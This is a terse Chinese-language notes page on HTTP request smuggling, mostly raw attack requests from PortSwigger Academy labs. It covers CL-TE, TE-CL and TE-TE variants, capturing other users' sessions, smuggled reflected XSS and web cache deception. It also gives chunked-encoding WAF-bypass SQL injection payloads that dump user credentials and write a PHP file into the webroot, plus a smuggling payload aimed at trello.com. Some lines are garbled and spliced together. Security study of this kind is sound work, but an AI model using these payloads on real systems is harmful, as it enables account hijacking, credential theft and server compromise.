参考链接(有可能需要FQ):
https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d
Transfer-Encoding:chunked
POST/HTTP/1.1
Host:ningfeng.com
Content-Type:application/x-www-form-urlencoded
Transfer-Encoding:chunked
b(十进制是11 16进制是b)
q=smuggling
6
hahaha
0
空
空
Transfer-Encoding的妙用
绕过waf使用分块
id=1 id=1 union select 1,2,table_name,4 from information_schema.tables where table_schema='yzm'
id=1 id=1 union select 1,2,username,password from user
id=1 union select 1,2,column_name,4 from information_schema.columunion select 1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4
ns where table_schma='yzm' and table_name='user'
id=1 union select 1,2,username,password from user union select 1,2,3,'<?php phpinfo()?>' into outfile "C:/phpStudy/PHPTutorial/WWW/shell1.php"%23
CL-TE走私
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
--------
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding:chunked
0
A
TE-CL走私
https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
-------
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
TE-TE走私
https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
------
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-encoding: chunked
Transfer-encoding: cow
8
SMUGGLED
0
一、实战利用走私造成账户劫持
https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests
POST / HTTP/1.1
Host: acea1f901e2e1cad80e665da0052003e.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests
Connection: close
Cookie: session=8OpNIpcPROeJCh4NTKrKdswvL3UVLcZ7
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 466
Transfer-encoding: chunked
0
POST /post/comment HTTP/1.1
Host: acea1f901e2e1cad80e665da0052003e.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 800
Connection: close
Cookie: session=8OpNIpcPROeJCh4NTKrKdswvL3UVLcZ7
csrf=JysTwJjScrQNCUPsyWbZMwwMKlpltaCU&postId=3&name=guocool&email=4513641%40qq.com&website=https%3A%2F%2Fwww.baidu.com&comment=aaa
二、实战利用走私使反射xss“升级”
https://portswigger.net/web-security/request-smuggling/exploiting/lab-deliver-reflected-xss
POST / HTTP/1.1
Host: ac321f5c1edb914d80ec24bd00760018.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: session=U4uy6HF2ysWgo9x3puFV5tWfJghUCzY9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 457
Transfer-encoding: chunked
0
GET /post?postId=4 HTTP/1.1
Host: ac321f5c1edb914d80ec24bd00760018.web-security-academy.net
User-Agent: "><script/src=//15.rs></script>#
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://ac321f5c1edb914d80ec24bd00760018.web-security-academy.net/
Connection: close
Cookie: session=U4uy6HF2ysWgo9x3puFV5tWfJghUCzY9
注意事项:
先抓主页,再将走私的请求放到主页面请求,最后抓主页页面看是否又xss,有的话再次访问主页就会发现出现反射型xss
补充知识点:
三、实战利用走私造成web缓存欺骗----------The credentials are: carlos / montoya
https://portswigger.net/web-security/request-smuggling/exploiting/lab-perform-web-cache-deception
POST / HTTP/1.1
Host: ac3e1f611ffb77d4803f429c00a200c3.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-perform-web-cache-deception
Connection: close
Cookie: session=bPdxgrOnPdSMS5P7CzEX5SpaN3jA46Pl
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Transfer-encoding: chunked
0
GET /my-account HTTP/1.1
Foo: X
注意:疯狂请求图片地址,一次没有多次就可以得到API key
重头戏:
Trello的请求走私挖掘
POST /1/cards HTTP/1.1
Host:trello.com
Transfer-Encoding: [tab] chunked
Content-Length:4
9f[159]
PUT /1/members/1234 HTTP/1.1
Host: trello.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
x=x&csrf=1234&username=testzzz&bio=cake
0
GET /HTTP/1.1
Host:trello.com
彩蛋(需要FQ查看):https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d